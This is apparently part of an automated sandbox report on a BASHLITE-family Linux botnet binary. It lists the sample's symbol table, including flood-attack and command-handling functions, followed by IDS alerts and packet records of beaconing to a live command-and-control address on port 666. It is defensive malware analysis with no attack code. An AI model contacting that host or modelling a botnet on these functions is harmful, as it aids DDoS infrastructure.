            fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fseeko64.symtab0x40e134225FUNC<unknown>DEFAULT2
            fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fstat.symtab0x40ddb482FUNC<unknown>DEFAULT2
            fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fstat64.symtab0x40ddb482FUNC<unknown>DEFAULT2
            fwrite_unlocked.symtab0x408a50128FUNC<unknown>DEFAULT2
            fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getBuild.symtab0x4058ec6FUNC<unknown>DEFAULT2
            getHost.symtab0x4016aa65FUNC<unknown>DEFAULT2
            getOurIP.symtab0x405709483FUNC<unknown>DEFAULT2
            get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getc.symtab0x40cd00128FUNC<unknown>DEFAULT2
            getc_unlocked.symtab0x40d010222FUNC<unknown>DEFAULT2
            getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getdtablesize.symtab0x40769836FUNC<unknown>DEFAULT2
            getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getegid.symtab0x40b8688FUNC<unknown>DEFAULT2
            getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            geteuid.symtab0x4075e08FUNC<unknown>DEFAULT2
            geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getgid.symtab0x40b8bc8FUNC<unknown>DEFAULT2
            getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostbyname.symtab0x40946010FUNC<unknown>DEFAULT2
            gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostbyname2.symtab0x40946c65FUNC<unknown>DEFAULT2
            gethostbyname2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostbyname2_r.symtab0x40da60761FUNC<unknown>DEFAULT2
            gethostbyname2_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostbyname_r.symtab0x40f67c791FUNC<unknown>DEFAULT2
            gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostname.symtab0x40f9c094FUNC<unknown>DEFAULT2
            gethostname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getpagesize.symtab0x40b7f819FUNC<unknown>DEFAULT2
            getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getpid.symtab0x4075a48FUNC<unknown>DEFAULT2
            getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getppid.symtab0x4075088FUNC<unknown>DEFAULT2
            getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getrlimit.symtab0x40b84040FUNC<unknown>DEFAULT2
            getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getrlimit64.symtab0x40b84040FUNC<unknown>DEFAULT2
            getsockname.symtab0x4094dc41FUNC<unknown>DEFAULT2
            getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getsockopt.symtab0x40950850FUNC<unknown>DEFAULT2
            getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getuid.symtab0x40b80c8FUNC<unknown>DEFAULT2
            getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            h_errno.symtab0x51f42c4OBJECT<unknown>DEFAULT10
            hacks.symtab0x518c004OBJECT<unknown>DEFAULT9
            hacks2.symtab0x518c044OBJECT<unknown>DEFAULT9
            hacks3.symtab0x518c084OBJECT<unknown>DEFAULT9
            hacks4.symtab0x518c0c4OBJECT<unknown>DEFAULT9
            hextable.symtab0x410d402048OBJECT<unknown>DEFAULT4
            hoste.5764.symtab0x51f3d032OBJECT<unknown>DEFAULT10
            htonl.symtab0x40942c5FUNC<unknown>DEFAULT2
            htons.symtab0x4094248FUNC<unknown>DEFAULT2
            httphex.symtab0x4035e71096FUNC<unknown>DEFAULT2
            i.5272.symtab0x518d4c4OBJECT<unknown>DEFAULT9
            index.symtab0x408bb0417FUNC<unknown>DEFAULT2
            inet_addr.symtab0x40944029FUNC<unknown>DEFAULT2
            inet_aton.symtab0x40d9d8135FUNC<unknown>DEFAULT2
            inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            inet_ntop.symtab0x40e771518FUNC<unknown>DEFAULT2
            inet_ntop4.symtab0x40e67e243FUNC<unknown>DEFAULT2
            inet_pton.symtab0x40e491493FUNC<unknown>DEFAULT2
            inet_pton4.symtab0x40e40c133FUNC<unknown>DEFAULT2
            initConnection.symtab0x4055a2359FUNC<unknown>DEFAULT2
            init_rand.symtab0x400504126FUNC<unknown>DEFAULT2
            initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            initstate.symtab0x40aa16110FUNC<unknown>DEFAULT2
            initstate_r.symtab0x40ac88185FUNC<unknown>DEFAULT2
            ioctl.symtab0x4077dc101FUNC<unknown>DEFAULT2
            ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            isatty.symtab0x40939825FUNC<unknown>DEFAULT2
            isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            kill.symtab0x4076bc44FUNC<unknown>DEFAULT2
            kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            killer_status.symtab0x5191b04OBJECT<unknown>DEFAULT10
            last_id.5826.symtab0x5191202OBJECT<unknown>DEFAULT9
            last_ns_num.5825.symtab0x51f4384OBJECT<unknown>DEFAULT10
            libc/string/x86_64/bzero.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/mempcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strchr.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strcmp.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strcspn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strlen.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strpbrk.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strspn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/sysdeps/linux/x86_64/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/sysdeps/linux/x86_64/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/sysdeps/linux/x86_64/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/sysdeps/linux/x86_64/vfork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            listFork.symtab0x401c14211FUNC<unknown>DEFAULT2
            llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            lseek.symtab0x40fe9845FUNC<unknown>DEFAULT2
            lseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            lseek64.symtab0x40fa705FUNC<unknown>DEFAULT2
            macAddress.symtab0x5191b46OBJECT<unknown>DEFAULT10
            main.symtab0x4058f21624FUNC<unknown>DEFAULT2
            main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            makeIPPacket.symtab0x401e33153FUNC<unknown>DEFAULT2
            makeRandomStr.symtab0x401722110FUNC<unknown>DEFAULT2
            makevsepacket.symtab0x402e3c169FUNC<unknown>DEFAULT2
            malloc.symtab0x40979e2187FUNC<unknown>DEFAULT2
            malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            malloc_trim.symtab0x40a88428FUNC<unknown>DEFAULT2
            memchr.symtab0x40d2dc236FUNC<unknown>DEFAULT2
            memchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            memcpy.symtab0x408f50102FUNC<unknown>DEFAULT2
            memmove.symtab0x40d3c8702FUNC<unknown>DEFAULT2
            memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            mempcpy.symtab0x40d28090FUNC<unknown>DEFAULT2
            memrchr.symtab0x40d7a8233FUNC<unknown>DEFAULT2
            memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            memset.symtab0x408ad0210FUNC<unknown>DEFAULT2
            mmap.symtab0x40b6f448FUNC<unknown>DEFAULT2
            mmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            mremap.symtab0x40b91442FUNC<unknown>DEFAULT2
            mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            munmap.symtab0x40b8c438FUNC<unknown>DEFAULT2
            munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            mylock.symtab0x518fd040OBJECT<unknown>DEFAULT9
            mylock.symtab0x51900040OBJECT<unknown>DEFAULT9
            nanosleep.symtab0x40b8ec38FUNC<unknown>DEFAULT2
            nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            next_start.1699.symtab0x51f2008OBJECT<unknown>DEFAULT10
            ngPid.symtab0x51f4744OBJECT<unknown>DEFAULT10
            nprocessors_onln.symtab0x40afa4223FUNC<unknown>DEFAULT2
            ntohl.symtab0x4094395FUNC<unknown>DEFAULT2
            ntohl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            ntohs.symtab0x4094318FUNC<unknown>DEFAULT2
            ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            numpids.symtab0x5191a88OBJECT<unknown>DEFAULT10
            object.5162.symtab0x51916048OBJECT<unknown>DEFAULT10
            open.symtab0x407510106FUNC<unknown>DEFAULT2
            open.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            opendir.symtab0x40ba71157FUNC<unknown>DEFAULT2
            opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            ourIP.symtab0x51f4704OBJECT<unknown>DEFAULT10
            p.5148.symtab0x518be80OBJECT<unknown>DEFAULT9
            parseHex.symtab0x40152585FUNC<unknown>DEFAULT2
            parse_config.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            pids.symtab0x51f4808OBJECT<unknown>DEFAULT10
            pipe.symtab0x40757c38FUNC<unknown>DEFAULT2
            pipe.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            poll.symtab0x40f99441FUNC<unknown>DEFAULT2
            poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            prctl.symtab0x4075b444FUNC<unknown>DEFAULT2
            prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            prefix.5134.symtab0x4138a812OBJECT<unknown>DEFAULT4
            print.symtab0x400a321083FUNC<unknown>DEFAULT2
            printchar.symtab0x4007bf75FUNC<unknown>DEFAULT2
            printi.symtab0x4008f1321FUNC<unknown>DEFAULT2
            prints.symtab0x40080a231FUNC<unknown>DEFAULT2
            processCmd.symtab0x403a2f7027FUNC<unknown>DEFAULT2
            program_invocation_name.symtab0x5191188OBJECT<unknown>DEFAULT9
            program_invocation_short_name.symtab0x5191108OBJECT<unknown>DEFAULT9
            qual_chars.5141.symtab0x4138c020OBJECT<unknown>DEFAULT4
            raise.symtab0x40dd5c18FUNC<unknown>DEFAULT2
            raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            rand.symtab0x40a96811FUNC<unknown>DEFAULT2
            rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            rand__str.symtab0x406012135FUNC<unknown>DEFAULT2
            rand_alpha_str.symtab0x406099118FUNC<unknown>DEFAULT2
            rand_alphastr.symtab0x400710175FUNC<unknown>DEFAULT2
            rand_cmwc.symtab0x40065a182FUNC<unknown>DEFAULT2
            rand_init.symtab0x405f4c83FUNC<unknown>DEFAULT2
            rand_next.symtab0x405f9f115FUNC<unknown>DEFAULT2
            random.symtab0x40a97472FUNC<unknown>DEFAULT2
            random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            random_poly_info.symtab0x4144d040OBJECT<unknown>DEFAULT4
            random_r.symtab0x40ab7790FUNC<unknown>DEFAULT2
            random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            randtbl.symtab0x519060128OBJECT<unknown>DEFAULT9
            rawmemchr.symtab0x40d6e8189FUNC<unknown>DEFAULT2
            rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            read.symtab0x40767039FUNC<unknown>DEFAULT2
            read.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            read_etc_hosts_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            readdir64.symtab0x40bb84143FUNC<unknown>DEFAULT2
            readdir64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            realloc.symtab0x40a124878FUNC<unknown>DEFAULT2
            realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            recv.symtab0x40953c11FUNC<unknown>DEFAULT2
            recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            recvLine.symtab0x401790574FUNC<unknown>DEFAULT2
            recvfrom.symtab0x40954845FUNC<unknown>DEFAULT2
            recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            resolv_conf_mtime.5807.symtab0x51f4684OBJECT<unknown>DEFAULT10
            resolv_domain_to_hostname.symtab0x406110156FUNC<unknown>DEFAULT2
            resolv_entries_free.symtab0x40680c56FUNC<unknown>DEFAULT2
            resolv_lookup.symtab0x4062541464FUNC<unknown>DEFAULT2
            resolv_skip_name.symtab0x4061ac168FUNC<unknown>DEFAULT2
            rindex.symtab0x40d89453FUNC<unknown>DEFAULT2
            rtcp.symtab0x4028a1939FUNC<unknown>DEFAULT2
            sbrk.symtab0x40b87074FUNC<unknown>DEFAULT2
            sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            scanPid.symtab0x51f4784OBJECT<unknown>DEFAULT10
            select.symtab0x40764444FUNC<unknown>DEFAULT2
            select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            send.symtab0x40957811FUNC<unknown>DEFAULT2
            send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sendSTD.symtab0x402c4c496FUNC<unknown>DEFAULT2
            sendto.symtab0x40958448FUNC<unknown>DEFAULT2
            sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            setsockopt.symtab0x4095b453FUNC<unknown>DEFAULT2
            setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            setstate.symtab0x40a9bc90FUNC<unknown>DEFAULT2
            setstate_r.symtab0x40aacc171FUNC<unknown>DEFAULT2
            sigaction.symtab0x40b72d114FUNC<unknown>DEFAULT2
            sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigaddset.symtab0x40961c35FUNC<unknown>DEFAULT2
            sigaddset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigempty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigemptyset.symtab0x40964010FUNC<unknown>DEFAULT2
            signal.symtab0x40964c133FUNC<unknown>DEFAULT2
            signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigprocmask.symtab0x40787047FUNC<unknown>DEFAULT2
            sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            skip_and_NUL_space.symtab0x40f1e544FUNC<unknown>DEFAULT2
            skip_nospace.symtab0x40f1bc41FUNC<unknown>DEFAULT2
            sleep.symtab0x40af14142FUNC<unknown>DEFAULT2
            sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            socket.symtab0x4095ec47FUNC<unknown>DEFAULT2
            socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            socket_connect.symtab0x40350f216FUNC<unknown>DEFAULT2
            sockprintf.symtab0x401035365FUNC<unknown>DEFAULT2
            spec_and_mask.5140.symtab0x4138e016OBJECT<unknown>DEFAULT4
            spec_base.5133.symtab0x4138b47OBJECT<unknown>DEFAULT4
            spec_chars.5137.symtab0x41394021OBJECT<unknown>DEFAULT4
            spec_flags.5136.symtab0x4139588OBJECT<unknown>DEFAULT4
            spec_or_mask.5139.symtab0x4138f016OBJECT<unknown>DEFAULT4
            spec_ranges.5138.symtab0x4139009OBJECT<unknown>DEFAULT4
            sprintf.symtab0x407924149FUNC<unknown>DEFAULT2
            sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            srand.symtab0x40aa8472FUNC<unknown>DEFAULT2
            srandom.symtab0x40aa8472FUNC<unknown>DEFAULT2
            srandom_r.symtab0x40abd1183FUNC<unknown>DEFAULT2
            stat.symtab0x40fa2079FUNC<unknown>DEFAULT2
            stat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            stat64.symtab0x40fa2079FUNC<unknown>DEFAULT2
            stderr.symtab0x518d908OBJECT<unknown>DEFAULT9
            stdin.symtab0x518d808OBJECT<unknown>DEFAULT9
            stdout.symtab0x518d888OBJECT<unknown>DEFAULT9
            strcasecmp.symtab0x40fec848FUNC<unknown>DEFAULT2
            strcasecmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strchr.symtab0x408bb0417FUNC<unknown>DEFAULT2
            strchrnul.symtab0x40d8cc268FUNC<unknown>DEFAULT2
            strchrnul.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strcmp.symtab0x408e4433FUNC<unknown>DEFAULT2
            strcoll.symtab0x408e4433FUNC<unknown>DEFAULT2
            strcpy.symtab0x408e70213FUNC<unknown>DEFAULT2
            strcspn.symtab0x40d168135FUNC<unknown>DEFAULT2
            strdup.symtab0x40fa7854FUNC<unknown>DEFAULT2
            strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strerror_r.symtab0x4092d4196FUNC<unknown>DEFAULT2
            strlen.symtab0x408d60225FUNC<unknown>DEFAULT2
            strncpy.symtab0x409224131FUNC<unknown>DEFAULT2
            strncpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strnlen.symtab0x409158201FUNC<unknown>DEFAULT2
            strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strpbrk.symtab0x40e380140FUNC<unknown>DEFAULT2
            strrchr.symtab0x40d89453FUNC<unknown>DEFAULT2
            strrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strspn.symtab0x40d1f0135FUNC<unknown>DEFAULT2
            strstr.symtab0x409094193FUNC<unknown>DEFAULT2
            strstr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strtoimax.symtab0x40ad5810FUNC<unknown>DEFAULT2
            strtok.symtab0x4092c810FUNC<unknown>DEFAULT2
            strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strtok_r.symtab0x40d68894FUNC<unknown>DEFAULT2
            strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strtol.symtab0x40ad5810FUNC<unknown>DEFAULT2
            strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            strtoll.symtab0x40ad5810FUNC<unknown>DEFAULT2
            strtoq.symtab0x40ad5810FUNC<unknown>DEFAULT2
            sysconf.symtab0x40b083499FUNC<unknown>DEFAULT2
            sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            szprintf.symtab0x400f50229FUNC<unknown>DEFAULT2
            table.symtab0x51f4a0480OBJECT<unknown>DEFAULT10
            table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            table_init.symtab0x406844486FUNC<unknown>DEFAULT2
            table_key.symtab0x518d504OBJECT<unknown>DEFAULT9
            table_lock_val.symtab0x406a5341FUNC<unknown>DEFAULT2
            table_retrieve_val.symtab0x406a7c63FUNC<unknown>DEFAULT2
            table_unlock_val.symtab0x406a2a41FUNC<unknown>DEFAULT2
            tcgetattr.symtab0x4093b4110FUNC<unknown>DEFAULT2
            tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            tcpFl00d.symtab0x4023ea1207FUNC<unknown>DEFAULT2
            tcpcsum.symtab0x401d8a169FUNC<unknown>DEFAULT2
            time.symtab0x4075ac8FUNC<unknown>DEFAULT2
            time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            times.symtab0x40b9408FUNC<unknown>DEFAULT2
            times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            toggle_obf.symtab0x406b1e288FUNC<unknown>DEFAULT2
            toupper.symtab0x4078cc30FUNC<unknown>DEFAULT2
            toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            trim.symtab0x400582216FUNC<unknown>DEFAULT2
            type_codes.symtab0x41391024OBJECT<unknown>DEFAULT4
            type_sizes.symtab0x41392812OBJECT<unknown>DEFAULT4
            udpfl00d.symtab0x401ecc1310FUNC<unknown>DEFAULT2
            uname.symtab0x40fe7038FUNC<unknown>DEFAULT2
            uname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            unknown.1721.symtab0x41396014OBJECT<unknown>DEFAULT4
            unsafe_state.symtab0x51903040OBJECT<unknown>DEFAULT9
            uppercase.symtab0x4016eb55FUNC<unknown>DEFAULT2
            userID.symtab0x518d444OBJECT<unknown>DEFAULT9
            usleep.symtab0x40b39852FUNC<unknown>DEFAULT2
            usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            util_atoi.symtab0x406e53484FUNC<unknown>DEFAULT2
            util_fdgets.symtab0x40736a157FUNC<unknown>DEFAULT2
            util_isalpha.symtab0x40743053FUNC<unknown>DEFAULT2
            util_isdigit.symtab0x40749a41FUNC<unknown>DEFAULT2
            util_isspace.symtab0x40746553FUNC<unknown>DEFAULT2
            util_isupper.symtab0x40740741FUNC<unknown>DEFAULT2
            util_itoa.symtab0x407037280FUNC<unknown>DEFAULT2
            util_local_addr.symtab0x4072c8162FUNC<unknown>DEFAULT2
            util_memcpy.symtab0x406de268FUNC<unknown>DEFAULT2
            util_memsearch.symtab0x40714f140FUNC<unknown>DEFAULT2
            util_strcat.symtab0x406da066FUNC<unknown>DEFAULT2
            util_strcmp.symtab0x406cf3121FUNC<unknown>DEFAULT2
            util_strcpy.symtab0x406d6c52FUNC<unknown>DEFAULT2
            util_stristr.symtab0x4071db237FUNC<unknown>DEFAULT2
            util_strlen.symtab0x406c4047FUNC<unknown>DEFAULT2
            util_strncmp.symtab0x406c6f132FUNC<unknown>DEFAULT2
            util_zero.symtab0x406e2645FUNC<unknown>DEFAULT2
            vfork.symtab0x4074c421FUNC<unknown>DEFAULT2
            vivid_bp.symtab0x518c104OBJECT<unknown>DEFAULT9
            vseattack.symtab0x402ee51417FUNC<unknown>DEFAULT2
            vsnprintf.symtab0x4079bc189FUNC<unknown>DEFAULT2
            vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            w.symtab0x51d1d44OBJECT<unknown>DEFAULT10
            wait4.symtab0x40b7a047FUNC<unknown>DEFAULT2
            wait4.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            waitpid.symtab0x4076107FUNC<unknown>DEFAULT2
            waitpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            watchdog_maintain.symtab0x4003f0276FUNC<unknown>DEFAULT2
            watchdog_pid.symtab0x5191a44OBJECT<unknown>DEFAULT10
            wcrtomb.symtab0x40bf3868FUNC<unknown>DEFAULT2
            wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            wcsnrtombs.symtab0x40bf8c123FUNC<unknown>DEFAULT2
            wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            wcsrtombs.symtab0x40bf7c15FUNC<unknown>DEFAULT2
            wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            wildString.symtab0x40157a304FUNC<unknown>DEFAULT2
            write.symtab0x4077b042FUNC<unknown>DEFAULT2
            write.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            x.symtab0x51d1c84OBJECT<unknown>DEFAULT10
            xdigits.3745.symtab0x414e6017OBJECT<unknown>DEFAULT4
            xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            y.symtab0x51d1cc4OBJECT<unknown>DEFAULT10
            z.symtab0x51d1d04OBJECT<unknown>DEFAULT10
            zprintf.symtab0x400e6d227FUNC<unknown>DEFAULT2

            Network Behavior

            Suricata IDS Alerts

            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
            2025-05-10T07:44:16.485852+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155815492.60.77.69666TCP
            2025-05-10T07:44:16.758698+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558154TCP
            2025-05-10T07:44:32.037794+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155815692.60.77.69666TCP
            2025-05-10T07:44:32.310593+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558156TCP
            2025-05-10T07:44:47.594854+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155815892.60.77.69666TCP
            2025-05-10T07:44:47.867827+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558158TCP
            2025-05-10T07:45:03.154401+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155816092.60.77.69666TCP
            2025-05-10T07:45:03.427653+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558160TCP
            2025-05-10T07:45:18.714205+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155816292.60.77.69666TCP
            2025-05-10T07:45:18.988148+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558162TCP
            2025-05-10T07:45:34.274220+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155816492.60.77.69666TCP
            2025-05-10T07:45:34.547050+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558164TCP
            2025-05-10T07:45:49.835535+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155816692.60.77.69666TCP
            2025-05-10T07:45:50.109342+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558166TCP
            2025-05-10T07:46:05.397910+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155816892.60.77.69666TCP
            2025-05-10T07:46:05.672211+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558168TCP
            2025-05-10T07:46:20.958201+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155817092.60.77.69666TCP
            2025-05-10T07:46:21.231592+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558170TCP
            2025-05-10T07:46:36.516331+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155817292.60.77.69666TCP
            2025-05-10T07:46:36.789043+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558172TCP
            2025-05-10T07:46:52.076642+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155817492.60.77.69666TCP
            2025-05-10T07:46:52.349507+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558174TCP
            2025-05-10T07:47:07.632380+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155817692.60.77.69666TCP
            2025-05-10T07:47:07.905258+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558176TCP
            2025-05-10T07:47:23.188326+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155817892.60.77.69666TCP
            2025-05-10T07:47:23.461040+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558178TCP
            2025-05-10T07:47:38.744584+02002839490ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86)1192.168.2.155818092.60.77.69666TCP
            2025-05-10T07:47:39.017777+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1558180TCP

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            May 10, 2025 07:44:16.211878061 CEST58154666192.168.2.1592.60.77.69
            May 10, 2025 07:44:16.485321045 CEST6665815492.60.77.69192.168.2.15
            May 10, 2025 07:44:16.485851049 CEST58154666192.168.2.1592.60.77.69
            May 10, 2025 07:44:16.485852003 CEST58154666192.168.2.1592.60.77.69
            May 10, 2025 07:44:16.758658886 CEST6665815492.60.77.69192.168.2.15
            May 10, 2025 07:44:16.758697987 CEST6665815492.60.77.69192.168.2.15
            May 10, 2025 07:44:16.758708954 CEST6665815492.60.77.69192.168.2.15
            May 10, 2025 07:44:16.758770943 CEST58154666192.168.2.1592.60.77.69
